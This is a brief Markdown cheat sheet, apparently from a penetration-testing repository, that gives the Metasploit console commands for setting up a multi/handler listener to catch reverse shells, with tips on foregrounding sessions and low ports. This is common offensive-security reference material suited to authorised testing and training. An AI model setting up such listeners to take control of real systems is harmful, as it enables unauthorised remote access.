killchain-compendium/Reverse Shells/msfconsole.md

13 lines
284 B
Markdown
Raw Normal View History

2022-11-13 16:00:22 +01:00
# metasploit reverse shell
```use multi/handler```
```sh
set PAYLOAD <payload>
set LHOST <listen-address>
set LPORT <liste-port>
exploit -j
```
* multi/handler is backgrounded. Therefore, `session 1` foregrounds the session.
* __LPORT under 1024__ user must be root or use sudo